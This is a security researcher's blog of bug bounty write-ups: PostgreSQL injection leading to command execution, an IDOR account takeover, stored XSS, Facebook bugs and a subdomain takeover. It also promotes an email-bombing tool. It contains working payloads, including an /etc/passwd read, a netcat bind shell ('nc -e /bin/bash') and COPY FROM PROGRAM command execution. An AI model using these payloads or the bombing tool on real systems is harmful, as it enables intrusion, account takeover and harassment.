Hello,This is me!

Abdul Wahab

A Security Engineer Bug Bounty Hunter Synack Red Team Member

About me

Hello

I'mAbdul Wahab

Security Engineer | Synack Red Team Member| Bug Bounty Hunter

Turning my passion into my professional life. Love to break road and dig deeper as much as possible. Believe in no system is secure. Acknowledged by Google,Facebook,Paypal,Twitter and 250+ tech giants.

Blog

PostgreSQL Injection to Remote Code Execution

 


Aslam-O-Alaikum fellas! in this noobish article, I will post about my recent finding, PostgreSQL Injection, allowing an attacker to access the database. Furthermore, can read/write internal files too.


PostgreSQL, also known as Postgres, is a free and open-source relational database management system emphasizing extensibility and SQL compliance. It was originally named POSTGRES, referring to its origins as a successor to the Ingres database developed at the University of California, Berkeley

So, the program is a private program I cannot disclose its name hence let's call it "private.com". The application "private.com" is calling some sort of datasets from the database using a GET request, which looks like this:

https://private.com/private/datasets/?context_details=%7B%22company%22:%22Context+1%22,%22brand%22:%22Brand+1%22%7D&sort_on=last_modified_date&sort_order=DESC&page_number=1&page_size=10&search_text=%22%22




Now, in the above URL, 'sort_on' and 'sort_order' parameters working as follow 

SELECT * FROM prod.dataset WHERE (isactive is true) AND context_id = 'private' ORDER BY dataset.last_modified_date DESC LIMIT 20 OFFSET 0
in the above SQL query values from 'sort_on' and 'sort_order'  parameters are getting inserted and are not validating the user input. Hence, an attacker can break the old SQL query and can add his own query( Stacked Query).

Like this,

https://private.com/private/datasets/?context_details=%7B%22company%22:%22Context+1%22,%22brand%22:%22Brand+1%22%7D&sort_on=last_modified_date&sort_order=DESC%3bSELECT+version()--%26&page_number=1&page_size=10&search_text=%22%22

The above URL insert our payload ";SELECT version()--&"in SQL query like this:

SELECT * FROM prod.dataset WHERE (isactive is true) AND context_id = 'private' ORDER BY dataset.last_modified_date DESC;SELECT version()--& LIMIT 20 OFFSET 0

and KaBOOM!



Now, to fetch all the Databases below payload can be used

;SELECT datname FROM pg_database--&



Remote Code Execution with PostgreSQL Injection

The following payload is used to confirm if we are superuser or not and Luckily I got Superuser = True :) 

;SELECT user;SHOW is_superuser; SELECT current_setting('is_superuser');SELECT usesuper FROM pg_user WHERE usename = CURRENT_USER;--&


Now, we can simple just read internal files like this:

;SELECT pg_read_file('/etc/passwd');--&/div>


To write a file following query can be used

;CREATE TABLE hw (t TEXT); INSERT INTO hw(t) VALUES('nc -lvvp 2346 -e /bin/bash'); SELECT * FROM hw; COPY hw(t) TO '/tmp/hw';

According to the Program rules, I am not allowed to make any changes to the server.

Below queries can be used to perform Remote Code Execution.
DROP TABLE IF EXISTS cmd_exec;          -- [Optional] Drop the table you want to use if it already exists
CREATE TABLE cmd_exec(cmd_output text); -- Create the table you want to hold the command output
COPY cmd_exec FROM PROGRAM 'id';        -- Run the system command via the COPY FROM PROGRAM function
SELECT * FROM cmd_exec;                 -- [Optional] View the results
DROP TABLE IF EXISTS cmd_exec;          -- [Optional] Remove the table


Thanks for reading.

./Logout

Account TakeOver Using IDOR (ZeroCopter)



Hello Buddies,
                        Hope You Guys Are doing. I am really a noobish guy named Abdulwahab Khan. In That Article, I want to share a PoC Of one of My Findings in Private Programs At ZeroCopter.
So without Wasting Time Lets Move Forward Towards The Actual PoC. While Testing the Program I don't find Thing On their Main Website Except for 2 3 Low Impact Bugs Which I don't Report Because I know They are Going to be Duplicate. So I again Looked into The Bounty Brief And See a Secondary Website So just Started testing It too. After Completing Account Registration I just went to the Account Details for Test of XSS and CSRF Types Attack. Unfortunately, they Are Using Good WAF Protection for XSS then I Tried for a CSRF attack. The Request Looks Like


CustomerAccount.CustomerId=4884c354-5c06-4014-8cdb-978aa7d4fd08&CustomerAccount.FirstName=Abdulwahab&CustomerAccount.LastName=Khan&CustomerAccount.Email=hackertabish786%40bugcrowdninja.com&CustomerAccount.Phone=&profileBirthDate=&myAccountSubscribe=on&profileSignUpDailyDeals=on&__RequestVerificationToken=XdRptyf0jaMfI0VqnRHh7b0g-qo7M420BfdrssU8gNf_md6n4_himhPVpUDn3hYjMmqrqq3cWqE5Znlv7oMRwPtrve5tZ80baAZvzg4Y1NCYCvZqyHc_9nJBcSQt3XTK_rbQ1itYopth1T6eM6H7Cg2
Now there 2 Things That are Seems To be Interesting  CustomerAccount.CustomerId and _RequestVerificationToken
Now I Tried Removing _RequestVerificationToken and Forwarded the Request And It Changed my Profile Settings without validating Verification Token.

I was Like:

After that, I Quickly Created a New Account with another Email address and Captured its Request of changing profile Removed _RequestVerificationToken and Changed it customerId to my old account, and forwarded the request.

Response is :
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/json; charset=utf-8
Request-Context: appId=cid-v1:6179475f-85be-4c05-84ee-87e58617700f
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Date: Fri, 19 july 2019 10:01:31 GMT
Connection: close
Content-Length: 32

"Your profile has been updated."
Now it's time to test that is it really updated on my account and my profile is updated.
That Moment i was:
After Few Moments of happiness, I realized how can an attacker exploit it if he dont knows the Victim CustomerID. Then I Started Finding CustomerID by testing API's and JSON Files but Failed Then i was like :

Then i logged out My account but saw a Unsubscribe Button i just Cliked it and it is only asking For Email i said ok Lets Check it when i entered email and Clicked UnSubscribe me from Updates a pop up appeared asking for password I See on BurpSuite and there is the Customer ID
Now i have a Full Scenario of Account takeover by knowing Email of victim.
Using following Steps
  1. Get CustomerID by Unsub Button
  2. Change email using IDOR
  3. Request a new Password on New Email
  4. BOOOM!
ZeroCopter TimeLine :
  • Reported 19 July 2019
  • Accepeted By ZeroCopter Team 19 july 2019
  • working in Progress 22 july 2019
  • Asked for retest 26 July 2019
  • Marked as Resolved 26 July 2019
  • Recieved Bounty in my btc wallet 27 July 2019

Regards,
Abdulwahab Khan
Independent Cyber Security Researcher.

HW-Bomber Python based Email Bombing tool


Hello Guys,

Hacker Wahab here.Today i am Going to Show You My First Ever Python Developed Pentesting Tool named " HW-Bomber" is a Email Bombing Tool Which integrate with Gmail & Yahoo Server To flood Victim Email.

Download Here:-

 https://github.com/hackerwahab/Hw-Bomber 

Watch Tutorial:-


Note:-

For Gmail Account You Must Enable "Less Secure App" From here:-
https://myaccount.google.com/lesssecureapps

Stored Xss in Freelancer

Hello Guys.Hope You are Doing Well Today i am Just Disclosing my Recent Finding on Bugcrowd.I just Founded Stored Xss Vulnerability in Main Domain of Freelancer i.e,
http://www.freelancer.com/

I Just Reported it and Got Nice Freelancer Swag and Some Kudos I am Also expecting  Reward From Them But AnyWay.


So, Lets Move on Towards the PoC of My Submission

POC:-

  1. Login
  2. Go to the Profile and Click Edit
  3. in Bio Section add the Simple Xss Payload i.e,
  4.    "><script>alert(1);</script>
  5. Click Save
  6. Open Profile in New Tab
  7. XSS ! BOOM 

 Watch Video PoC:- 




Report Summary:-

Submission created
2017-03-30 13:31:50 UTC

State changed
2017-03-31 06:29:04 UTC
Freelancer Engineer changed state to resolved

Freelancer Engineer Rewarded You With Swag 

Thanks,
Abdulwahab

Facebook Bugs | By Hacker Wahab


Aslam-O-Alaikum(Hello) Guys Here I am this post Contain all the Bugs I Have Founded in Facebook.

1.Open Redirect & Content Spoofing

Vulnerability Type
Open Redirector
Vulnerability Scope
Mobile Site or App
Title
Open Redirect & Content Spoofing
Description and Impact
Hi,

after Getting A Lots of Low Impact i Come back with an Open Redirector issue.
Reproduction Instructions/Proof of Concept
In the Reporting Section of Facebook all the Sensitive options is Disclose on UrL:-
https://mbasic.facebook.com/nfx/basic/question/?context_str=%7B%22initial_action_name%22%3A%22REPORT_CONTENT%22%2C%22breadcrumbs%22%3A%5B%22offensive%22%2C%22hatespeech%22%2C%22religious%22%5D%2C%22story_location%22%3A%22page%22%2C%22is_from_feed_tombstone%22%3Afalse%2C%22actions_taken%22%3A%22%22%2C%22is_rapid_reporting%22%3Afalse%2C%22reportable_ent_token%22%3A%222237869389770846%22%2C%22is_impostor%22%3A%22%22%7D&redirect_uri=http%3A%2F%2Fwww.hackerwahab.com%2F&prev_action_info=%7B%22action_name%22%3A%22UNSUBSCRIBE%22%2C%22completed_title%22%3A%22Posts+from+%5Cu200e%5Cu0645%5Cu0648%5Cu0644%5Cu0648%5Cu06cc+%5Cu0628%5Cu0631%5Cu0642%5Cu0639%5Cu06c1%5Cu200e+hidden%22%2C%22completed_subtitle%22%3A%22Poc+is+of+OPEN+REDIRECT+AND+CONTENT+SPOOFING.%22%7D&av=100015350014851&_rdr

After redirect_uri= we can add vuln web like i added in above url and after Completed_Subtitle you can add Content Spoofing Text.

As We interested in open redirect Click Done Then in Survey They Ask Community Stars Give Them Than Click Next then Click Submit a new page Open With Vulnerable URL
Video PoC:-
https://youtu.be/oFTKN7WWvQs
Thanks,
ABDULWAHAB,
Independent Cyber Security Researcher,
Is this bug public or known by third parties?
No
Can you reproduce this issue every time?
Yes
How did you find this bug?
Manually / Other

2.Delete Primary Email(Which is Unallowed by Facebook)

Vulnerability Type
Privacy / Authentication
Vulnerability Scope
Mobile Site or App
Title
Delete Primary Email(Which is Unallowed by Facebook)
Description and Impact
Hi,
My Self Abdulwahab.

As You Know That there is no way to delete an Primary Email But i found an indirect way to Delete an Primary Email.
Reproduction Instructions/Proof of Concept
As You can see on {POC 1.png} that there is no way to delete Primary.In Mobile site there is also no way
We can use this url:-
https://m.facebook.com/settings/email/?remove_email&email{Primary email Goes here}&refid=74

to Remove primary Email.
When u Open The Link Account Primary email Deleted as in (POC 2.png)
As i cannot upload video here so i use Youtube
Video PoC( Prv8 ):-
https://youtu.be/BUG1PLnCJjw
Thanks,
ABDULWAHAB,
Independent Cyber Security Researcher,
Is this bug public or known by third parties?
No
Can you reproduce this issue every time?
Yes
How did you find this bug?
Manually / Other

3.Change Account Password Without Knowing Current Password


Vulnerability Type
Privacy / Authentication
Vulnerability Scope
Main Site (www.facebook.com)
Title
Change Account Password Without Knowing Current Password
Description and Impact
Hi,
My name is ABDULWAHAB,I am Writing This to you because i think i can change a Fb Account password of a logged-in Account Without knowing Current Password.
Reproduction Instructions/Proof of Concept
1.Go to Settings
2.On Mobile add a Mobile Number u have access ( Enter You Mobile Number)
3.Logout
4.Click Forget Password
5.Enter Your Mobile Number you recently Added.
6.U Receive Code enter it
7.enter New Password And DONE!

As You See in all Procedure i dont Use Current Password and Account Password Changed

Fix Suggestion:-
ask current Password Field in adding a New Phone number

Thanks,
ABDULWAHAB,
Independent Cyber Security Researcher,
Is this bug public or known by third parties?
No
Can you reproduce this issue every time?
Yes
How did you find this bug?

4.Ip Steal Using Content Injection

Manually / Other
Vulnerability Type
Privacy / Authentication
Vulnerability Scope
Mobile Site or App
Title
Ip Steal Using Content Injection
Description and Impact
Hi.

I Founded an Content Injection issue on mobile site of Facebook.But it has Low impact so i try to increase Risk of Vulnerability so I found a Serious Problem IP STEAL.
Reproduction Instructions/Proof of Concept
1.Open Kali Linux terminal
2.Command to Listen on Port
nc -lvnp 1337 u can use any port
3.Login in to Facebook Account
4.Use this Port with YourIp In Such Way:-
https://m.facebook.com/deactivate/incentives/?carrier_name=HACKED BY ABDULWAHAB&carrier_logo_src=http://192.168.1.16:1337/&free_days=25555
5.When User Opens This Page Ip is Captured.
Video Poc:-
https://youtu.be/g2naYvWm4j0
Thanks,
ABDULWAHAB,
Independent Cyber Security Researcher,
Is this bug public or known by third parties?
No
Can you reproduce this issue every time?
Yes
How did you find this bug?
Manually / Other

5.Content Spoofing

Vulnerability Type
Other Vulnerability
Vulnerability Scope
Mobile Site or App
Title
Content Injection
Reproduction Instructions/Proof of Concept
1. goto Deactivate account
2. Choose any Condition
3.Click Deactivate
4.Now You see an add
5.Customize it by using its uRL

Thanks,
ABDULWAHAB,
Independent Cyber Security Researcher,
Is this bug public or known by third parties?
No
Can you reproduce this issue every time?
Yes
How did you find this bug?
Manually / Other

Video PoC(ALL BUGS):-


Sub_Domain TakeOver iwantmyname


Aslam-O-Alaikum,

Brothers and their Sisters.Today i am Going to Disclose my recent Findings on Iwantmyname(BugCrowd).
According to This Issue I am Able to Fully Takeover a Sub_domain.

Tool Used:-
Knockpy ( A python Sub_Domain Finder)

PoC:-
  • I just Founded a Sub Domain That is Created With Domain iwantmyname.com
    This SubDomain Contains The Nameserver's and DNS Recored of WpEngine But It is not linked with any account of Wp_engine.
  • Replication Steps
    1.Go to Wpengine.com
    2.Buy a Membership
    3.Add domain
    http://an.iwantmyname.com/
    4.Done
    Sub_domain Is Now Of Attacker.

  • Reward : Kudos

    Stored Xss in OnePageCrm


    Aslam-O-Alaikum,

    Friends,Hope You all are Fine.Today i am Going to Share the PoC of Stored Xss i Recently Founded in
    OnepageCrm.

    OnepageCrm:

    OnePageCRM is a simple online sales CRM for small business. Focus on your Next Action to easily convert leads into customers and grow your business.

    Summary Of Report
  • Submitted: 2016-11-20 15:33:41 UTC
  • State changed to resolved :2016-11-29 13:00:26 UTC
  • While Testing OnePageCrm I Oberved that Signup Field(Address Field) 
    Is Vulnerable to Xss so i try That and it Popup with my happiness.

    1.Signup with Contact Name in Address Field Below:-
    <script>alert(1);</script>
    2.Login with account
    3.Xss Executed

    Thanks,
    ABDULWAHAB,
    Independent Cyber Security Researcher,


    SEND ME A MESSAGE

    Search

    Hi There, I am

    Instagram

    About Me

    My photo
    Turning my passion into my professional life. Love to break road and dig deeper as much as possible. Believe in no system is secure. Acknowledged by Google,Facebook,Paypal,Twitter and 250+ tech giants.

    About Me

    Social media

    Flickr

    Popular Posts